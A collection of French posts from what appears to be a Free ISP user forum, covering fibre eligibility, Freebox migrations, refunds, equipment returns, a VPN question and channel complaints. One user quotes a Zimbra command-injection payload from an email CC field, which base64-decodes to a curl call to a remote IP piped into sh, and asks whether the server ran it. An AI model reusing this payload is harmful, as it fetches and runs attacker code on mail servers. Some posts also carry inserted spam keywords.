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Bonjour

Je pense qu'il y a priorité pour ceux qui sont  déjà en fibre optique
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Bonjour

Nous sommes au début du mois et je voulais faire la migration vers la freebox pop mais j'ai un message momentanément indisponible par si je veux migrer vers la delta ca marche mais je n'en veux pas je ne suis pas fibré

je pensais que le stock de pop revenait en début de mois
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Bonjour,
Même problème !

Suite achat mobile Free avec ODR, la rubrique n'apparait pas dans mon Espace Abonné.
"Rendez-vous sur votre Espace Abonné pour demander votre remboursement
• Connectez-vous sur mobile.free.fr/account/monODR
• Saisissez le numéro IMEI du smartphone présent sur l'étiquette du coffret ou sur votre facture
• Validez votre demande de remboursement
Vous avez 30 jours à compter de la date de votre commande pour nous adresser votre demande
de remboursement depuis votre Espace Abonné"

3244 contacté, mais toujours rien sur l'espace abonné et le délai va expirer...
C'est décevant

Si une solution existe, je suis preneur.

Tom


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Bonjour,

Suite résiliation au 01/08/2024, j'ai bien retourné l’intégralité du matériel avec le bon d'envoi fourni par Free.
Depuis j'ai reçu une première relance avec menace de facturation début septembre dont je n'ai pas tenu compte, pensant à une erreur de leur part.
Puis un autre mail le 15/09, identique.
N'ayant pas moyen de contacter Free autrement que par courrier écrit envoyé avec accusé de réception ou appel surtaxé, j'ai répondu au mail en question le 21/09, à l'adresse [email protected]
Sans retour.

Aujourd’hui, je reçois un SMS : "Veuillez renvoyer votre matériel... etc."

Donc, Free peut interpeller ses ex-clients par tout canal (mail, SMS...) mais l'ex-client ne peut pas répondre ? Ou en payant ?

Le matériel étant retourné avec leur propre bon de livraison, ils doivent savoir qu'ils l'ont reçu non ?

La menace de facturation porte sur :  "nous nous verrons contraints de vous facturer le prix de l'équipement
terminal, comme cela est prévu par nos Conditions Générales de Vente, au prix
indiqué dans la brochure tarifaire de Free, soit:
- 200 euros pour un Modem Freebox mini Server
- 200 euros pour un Boitier Freebox mini Player
- 39,99 euros l'unité pour un FreePlug"

Tout ça a bien été renvoyé, dans les cartons d'origine.

Merci (si quelqu'un sait comment faire) de m'indiquer la marche à suivre pour régler ça, si possible rapidement et sans frais... L'autre solution possible serait peut-être de résilier le mandat SEPA de Free ?
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Bonsoir à tous,
J'espère trouver de l'aide auprès de vous.

Voilà, je vous explique mon mon problème.

Nous avons 2 sites industriels qui tournent chacun avec une fibre free, le premier a une freebox pop, le second une freebox ultra (si besoin je peux faire basculer le premier site en freebox ultra également).
J'ai besoin d'interconnecter les 2 usines entre elles, pour que nous puissions échanger facilement des fichiers, imprimer à distance, etc…
Pour ça je pensais utiliser les VPN intégrer dans les freebox, l'idée n'étant pas de connecter chaque machine en VPN mais bien que ça soit l'ensemble de la connexion qui passe via le VPN (un peu comme le propos linksys ou cisco sur certains routeurs).

Auriez-vous une idée de comment paramétrer ça au mieux sur les freebox ?

Merci pour l'aide
Phil
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Salut.

J'ai reçu un email des différents opérateurs ces 2 dernières semaines m'annonçant ma futur éligibilité à la fibre. Et notamment free qui m'annonce une éligibilité au 17 juillet.  Mais je n'ai pas attendu cette date pour contacter free et souscrire à un forfait.... trop rapidement peut être.  Après réflexion,  j'ai décidé d'annuler ma demande d'abonnement hier alors même que la première étape du déploiement n'est pas finie. Je possède actuellement Netflix,geometry dashDisney + et Amazon prime, ce qui au final m'a poussé à changer d'avis et annuler ma demande d'abonnement freebox ultra à 49.99 euros pendant 1 an puis 59.99. Car mes abonnements svod ne sont pas attaché à mon futur abonnement free, car ce sont des abonnements streaming que j'ai souscrit sur des sites de partage d'abonnement comme spliiit.fr ou sharesub et qui donc ne sont pas mes abonnements personnelles.  Je souhaite donc conserver mes abonnements svod de Spliiit , résilier l'abonnement free ultra et souscrire au forfait freebox ultra essentiel qui différe du premier du nom par l'offre streaming. Le 17 juillet au matin j'ai demandé une résiliation pour éviter de payer des frais de migration si je décidait d'attendre la fin du déploiement pour changer de forfait,  étant encore dans le délai de rétractation.  J'ai reçu le même jour à des intervalle de temps différents des courriels me confirmant la validation de ma résiliation et la validation d'une nouvelle souscription mais cette fois ci avec le forfait ultra essentiel.  Seulement j'ai constaté que le passage de l'un à l'autre m'indique des choses différentes sur mon espace clients qui ne m'ont pas étés annoncés au téléphone.  Celle qui me dérange le plus c'est que je suis passé de 280 chaînes à 230 chaînes. Je ne suis pas sûre de comprendre la situation, j'hésite entre erreur de souscriptions du commercial à simplement un problème d'affichage (ce qui veut dire que au final j'aurais qd même 280 chaînes, car ce qui est sûr c'est qu'il est bien nommé comme forfait ultra essentiel).

Merci
Correct. Je viens également d'annuler mon forfait le mois dernier car j'ai constaté que beaucoup de chaînes étaient réduites. Parmi eux se trouvent certaines de mes chaînes préférées. J'ai appelé le centre d'appels et ils m'ont demandé d'acheter un forfait plus cher pour profiter de toute la gamme de chaînes.
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Bonjour,

J'ai reçu 4 mails contenant dans le champ CC un code bizard (Veuillez ne pas exécuter ce code, risque viral fort) :
CC: ppp`echo${IFS}Li4vLi4vY29tbW9uL2Jpbi9jdXJsIGh0dHA6Ly83OS4xMjQuNDkuODY6NDQzL2dwa3FyZmFwcWdxZ2Z0Zm52dmR4dnp5bm1yc2xsc2Np|base64${IFS}-d|sh`[email protected],ppp`echo${IFS}L29wdC96aW1icmEvY29tbW9uL2Jpbi9jdXJsIGh0dHA6Ly83OS4xMjQuNDkuODY6NDQzL2dwa3FyZmFwcWdxZ2Z0Zm52dmR4dnp5bm1yc2xsc2Np|base64${IFS}-d|sh`[email protected]
Comment savoir si le serveur Zimbra a exécuter ou non ce genre de code ?

Merci d'avance.
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Tu prends ton abonnement mobile chez Free et tu le connecte à la box, tu passe en illimité alors.
J’ai pensé à la même chose, tu mets ça dans une petite box 4G ou 5G que tu as acheté avant pour les vacances c’est parfait. Du moins moi c’est ce que je fais en général.
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Your article addresses exactly the questions I was having. You explained the issues in great detail and thoroughly and Papa’s freezeria
 They really help the user and make using the site easier
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  Oui c'est bien cela ..

 Je sais çà manque un peu de confidentialité :(

L'email pour se connecter tu peux en créer une Free sans  rapport avec ton nom de famille
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